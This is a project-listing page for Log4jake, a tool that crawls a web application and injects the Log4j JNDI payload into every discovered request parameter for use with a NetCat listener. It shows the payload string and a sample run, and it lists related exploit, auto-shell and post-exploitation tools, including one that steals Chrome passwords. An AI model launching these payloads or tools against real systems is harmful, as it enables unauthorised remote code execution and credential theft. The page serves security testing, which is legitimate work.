Log4jake works by spidering a web application for GET/POST requests

Last update: May 9, 2022

Related tags

Overview

Log4jake

Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any discovered parameters with the ${jndi:ldap://:389} Log4j payload. Note that this tool is designed to work simultaneously with a NetCat listener.

If you want to test behind authentication, use the commented '#req.add_header('Authorization', "token_goes_here")' line to add the proper token. If you are experiencing SSL errors, use the commented '#context = ssl._create_unverified_context()' line in addition to 'resp = urllib.request.urlopen(req, context=context)'

Syntax:

  └─$ python3 log4jake.py https://10.10.3.50
Remember to start NetCat Listener on port 389!!!
Enter IP address of your Listener: 10.10.3.4  

Starting Web Spider
-------------------

SPIDERING -> https://10.10.3.50/
SPIDERING -> https://10.10.3.50/signup
POST /signup
SPIDERING -> https://10.10.3.50/login
POST /login_exec
SPIDERING -> https://10.10.3.50/clients
SPIDERING -> https://10.10.3.50/admin/website
SPIDERING -> https://10.10.3.50/cdn-cgi/l/email-protection#9ef4f1f0defdf8ffedf7eafbedb0fdf1f3
SPIDERING -> https://10.10.3.50/forgotpassword
POST /mailer5

A burp-suite plugin that extract all parameter names from in-scope requests

ParamsExtractor A burp-suite plugin that extract all parameters name from in-scope requests. You can run the plugin while you are working on the targe

29 Nov 9, 2022

Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

5 Nov 9, 2022

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask.

PWInput A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask. Installatio

26 Sep 4, 2022

Http-proxy-list - A lightweight project that hourly scrapes lots of free-proxy sites, validates if it works, and serves a clean proxy list

Free HTTP Proxy List 🌍 It is a lightweight project that hourly scrapes lots of

142 Jan 5, 2023

The Web Application Firewall Paranoia Level Test Tool.

Quick WAF "paranoid" Doctor Evaluation WAFPARAN01D3 The Web Application Firewall Paranoia Level Test Tool. — From alt3kx.github.io Introduction to Par

22 Jul 25, 2022

Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

20 Nov 24, 2022

Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

About create a target list or select one target, scans then exploits, done! Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool t

108 Dec 4, 2021

Get related domains / subdomains by looking at Google Analytics IDs

DomainRelationShips ██╗ ██╗ █████╗ ██╗██████╗ ██║ ██║██╔══██╗ ██║██╔══██╗ ██║ ██║█████

161 Jan 2, 2023

Log4jake works by spidering a web application for GET/POST requests

Related tags

Overview

Log4jake

You might also like...

A burp-suite plugin that extract all parameter names from in-scope requests

Python script that sends CVE-2021-44228 log4j payload requests to url list

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask.

Http-proxy-list - A lightweight project that hourly scrapes lots of free-proxy sites, validates if it works, and serves a clean proxy list

The Web Application Firewall Paranoia Level Test Tool.

Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

Get related domains / subdomains by looking at Google Analytics IDs

Owner

log4j2 passive burp rce scanning tool get post cookie full parameter recognition

Add a Web Server based on Rogue Mysql Server to allow remote user get

DomainMonitor is a web project that has a RESTful API to get a domain's subdomains and whois data.

An open-source post-exploitation framework for students, researchers and developers.

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Crowbar - A windows post exploitation tool

Proof-of-concept obfuscation toolkit for C# post-exploitation tools

A windows post exploitation tool that contains a lot of features for information gathering and more.

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests.